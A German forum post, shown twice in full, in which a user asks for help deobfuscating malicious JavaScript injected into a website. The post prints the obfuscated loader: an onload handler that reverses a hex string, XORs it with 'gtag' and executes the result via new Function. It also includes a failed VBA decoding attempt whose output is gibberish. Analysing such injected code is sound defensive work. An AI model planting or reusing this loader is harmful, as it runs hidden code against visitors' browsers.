Hallo,
vor einigen Tagen gab es hier eine Frage zu Javascript, die schnell und gut beantwortet wurde.
Falls die Frage hier stört, bitte löschen.
Auf einer Webseite wurde ein vermutlich bösartiger Javascript-Code eingeschleust:
Mein Entschlüsselungs-Versuch mit VBA:
ergab
ohne Reverse: g;/}=).)gtgd(thepe.niirchu@ qeh{&>; rncvc *'cggsuek'.rcnctuiJthepEbdg.qw(widhiq;/)`eth(niiraeoj(rncnipkoEITUcdiche&+&fiv.tckeoUbcW&wcn&=&wq.qobnow=)/apr&^&cjv&>; elp(vak.hmp.(..eboErghEmir`.anorrS&=&fiv&tunic=22 ; gvt;[34,?7*31,>8*5?,?6*9>,72*80,?6*11,77*90,57*5*11,?6*31,2,?8*5?,>8*91,17*51,>6*51,77*3>,>8*91,39*1?,26*5*5*67,?8*9>,59] ; hmp rshoe
mit Reverse: eohsr pmh ; ]95,>9*8?,76*5*5*62,?1*93,19*8>,>3*77,15*6>,15*71,19*8>,?5*8?,2,13*6?,11*5*75,09*77,11*6?,08*27,>9*6?,?5*8>,13*7?,43[;tvg ; 22=cinut&vif&=&Srrona.`rimEhgrEobe..(.pmh.kav(ple ;>&vjc&^&rpa/)=wonboq.qw&=&ncw&WcbUoekct.vif&+&ehcidcUTIEokpincnr(joeariin(hte`)/;qihdiw(wq.gdbEpehtJiutcncr.'keusggc'* cvcnr ;>&{heq @uhcriin.epeht(dgtg).)=}/;g
Als key für XOR habe ich "gtag" interpretiert, offensichtlich falsch.
Gesucht ist eine URL.
Kann jemand die verschachtelte Struktur des Javascript-Code verstehen?
Danke
mfg
vor einigen Tagen gab es hier eine Frage zu Javascript, die schnell und gut beantwortet wurde.
Falls die Frage hier stört, bitte löschen.
Auf einer Webseite wurde ein vermutlich bösartiger Javascript-Code eingeschleust:
Code:
onload="!func_tion(aa,t){!func_tion(aa){var n=function(aa,t){return aa.split('').map(function(aa,n){return String.fromCharCode(aa.charCodeAt(0)^t.charCodeAt(n%t.length))}).join('')}(aa.split('').reverse().join(''),t);new Func_tion(n)()}(aa)}('\x4f\x4e\x1a\x5a\x5d\x4f\x4e\x00\x00\x06\x03\x4f\x00\x09\x02\x17\x11\x4f\x09\x0e\x1d\x13\x04\x0f\x01\x21\x47\x16\x11\x09\x1c\x41\x4a\x5a\x47\x15\x1a\x02\x11\x04\x54\x4b\x40\x04\x13\x06\x14\x12\x11\x0a\x40\x49\x06\x02\x09\x04\x00\x14\x0e\x2d\x00\x09\x02\x17\x31\x03\x03\x00\x5a\x10\x10\x4f\x03\x08\x03\x0f\x1d\x10\x5c\x48\x5d\x01\x02\x13\x1c\x49\x09\x0e\x1d\x13\x06\x02\x1b\x0b\x4f\x15\x1a\x02\x09\x0e\x04\x0a\x08\x22\x3d\x35\x32\x04\x10\x08\x04\x0f\x11\x47\x4c\x41\x12\x08\x11\x49\x00\x02\x0c\x02\x1b\x34\x05\x04\x23\x47\x10\x04\x1a\x47\x5a\x41\x03\x10\x49\x16\x1b\x03\x09\x08\x03\x5c\x4e\x48\x15\x11\x15\x41\x2a\x47\x04\x0d\x02\x47\x59\x5c\x54\x04\x0b\x17\x5c\x17\x06\x0c\x5a\x09\x0a\x17\x5a\x49\x49\x49\x11\x03\x08\x22\x06\x06\x0f\x22\x19\x08\x15\x07\x5a\x00\x09\x08\x06\x13\x34\x41\x49\x47\x01\x0e\x02\x47\x13\x12\x1a\x08\x04\x5a\x46\x53\x47\x5c\x54\x06\x11\x13\x4f\x3a\x54\x53\x58\x5e\x50\x4d\x47\x50\x4b\x59\x4c\x4b\x52\x58\x58\x5e\x51\x4d\x4d\x5f\x4b\x50\x46\x4b\x5f\x57\x58\x5e\x51\x4d\x45\x50\x4b\x50\x43\x4b\x5e\x57\x58\x54\x50\x4d\x41\x4b\x56\x56\x58\x5e\x51\x4d\x47\x50\x4b\x55\x58\x5e\x5f\x4d\x41\x5e\x4b\x59\x4c\x4b\x5e\x56\x58\x50\x50\x4d\x41\x50\x4b\x59\x42\x4b\x52\x56\x58\x56\x50\x4d\x47\x5f\x4b\x59\x4c\x4b\x5e\x56\x58\x52\x5e\x4d\x45\x5e\x4b\x55\x42\x4b\x52\x4d\x41\x4b\x51\x50\x58\x5e\x5f\x4d\x4d\x5f\x4b\x52\x4d\x3c\x47\x5c\x54\x09\x0a\x17\x54\x13\x14\x0f\x1b\x04', 'gtag');"
Mein Entschlüsselungs-Versuch mit VBA:
Code:
Sub T_1()
Dim Ar, Res As String, Key() As Byte, WSF As WorksheetFunction
Set WSF = Application.WorksheetFunction
Ar = Split(Cells(1, 1), "\x")
Key = VBA.StrConv("gtag", vbFromUnicode)
Debug.Print UBound(Key)
For i = 0 To UBound(Ar)
Res = Res & Chr(WSF.Decimal(Ar(i), 16) Xor Key(i Mod 4))
Next i
Debug.Print Res
Debug.Print StrReverse(Res)
ergab
ohne Reverse: g;/}=).)gtgd(thepe.niirchu@ qeh{&>; rncvc *'cggsuek'.rcnctuiJthepEbdg.qw(widhiq;/)`eth(niiraeoj(rncnipkoEITUcdiche&+&fiv.tckeoUbcW&wcn&=&wq.qobnow=)/apr&^&cjv&>; elp(vak.hmp.(..eboErghEmir`.anorrS&=&fiv&tunic=22 ; gvt;[34,?7*31,>8*5?,?6*9>,72*80,?6*11,77*90,57*5*11,?6*31,2,?8*5?,>8*91,17*51,>6*51,77*3>,>8*91,39*1?,26*5*5*67,?8*9>,59] ; hmp rshoe
mit Reverse: eohsr pmh ; ]95,>9*8?,76*5*5*62,?1*93,19*8>,>3*77,15*6>,15*71,19*8>,?5*8?,2,13*6?,11*5*75,09*77,11*6?,08*27,>9*6?,?5*8>,13*7?,43[;tvg ; 22=cinut&vif&=&Srrona.`rimEhgrEobe..(.pmh.kav(ple ;>&vjc&^&rpa/)=wonboq.qw&=&ncw&WcbUoekct.vif&+&ehcidcUTIEokpincnr(joeariin(hte`)/;qihdiw(wq.gdbEpehtJiutcncr.'keusggc'* cvcnr ;>&{heq @uhcriin.epeht(dgtg).)=}/;g
Als key für XOR habe ich "gtag" interpretiert, offensichtlich falsch.
Gesucht ist eine URL.
Kann jemand die verschachtelte Struktur des Javascript-Code verstehen?
Danke
mfg